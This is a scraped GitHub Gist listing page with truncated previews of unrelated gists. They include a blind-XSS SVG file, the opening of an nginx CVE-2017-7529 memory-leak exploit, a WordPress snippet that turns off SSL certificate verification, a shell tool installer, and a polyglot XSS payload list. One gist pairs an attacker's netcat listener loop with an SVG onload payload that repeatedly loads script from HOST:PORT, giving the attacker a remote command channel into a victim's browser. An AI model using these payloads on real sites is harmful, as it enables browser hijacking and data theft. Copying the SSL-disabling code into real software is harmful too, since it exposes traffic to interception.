KR. Laboratories krlabs
🇺🇦
ioribrn
/ Blind XSS in SVG FILE
Created
March 16, 2020 13:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" standalone="no"?> | |
| <!DOCTYPE svg PUBLIC | |
| "-//W3C//DTD SVG 1.1//EN" | |
| "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> | |
| <svg width="200" | |
| height="200" | |
| zoomAndPan="disable" | |
| xmlns="http://www.w3.org/2000/svg" | |
| xmlns:xlink="http://www.w3.org/1999/xlink" | |
| xml:space="preserve"> |
pich4ya
/ nginx_leak.py
Created
May 9, 2018 08:51
Nginx - Remote Integer Overflow Vulnerability (Memory Leak, CVE-2017-7529)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding:utf-8 -*- | |
| # https://github.com/nixawk/labs/issues/15 | |
| # Nginx - Remote Integer Overflow Vulnerability (Memory Leak) | |
| # CVE-2017-7529 | |
| import requests | |
| import logging | |
| import sys |
slaFFik
/ wpms-smtp-disable-ssl-verify.php
Last active
March 18, 2025 16:48
WP Mail SMTP: when using SMTP mailer - disable SSL verify on PHP 5.6+
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| add_filter('wp_mail_smtp_custom_options', function( $phpmailer ) { | |
| $phpmailer->SMTPOptions = array( | |
| 'ssl' => array( | |
| 'verify_peer' => false, | |
| 'verify_peer_name' => false, | |
| 'allow_self_signed' => true | |
| ) | |
| ); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | |
| Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)> |
nullrndtx
/ FlashTools-Installer.sh
Last active
October 17, 2024 21:09
SP Flash Tool on Linux? Why not? 8-)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # check root user | |
| if [ "$(id -u)" != 0 ]; then | |
| echo "ERROR! Run this script with root user!" | |
| exit 1 | |
| fi | |
| # tab width | |
| tabs 4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'"> | |
| ';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT> | |
| ""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</ | |
| h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$ | |
| \';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88, | |
| 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68), | |
| 83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT> | |
| ';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){// |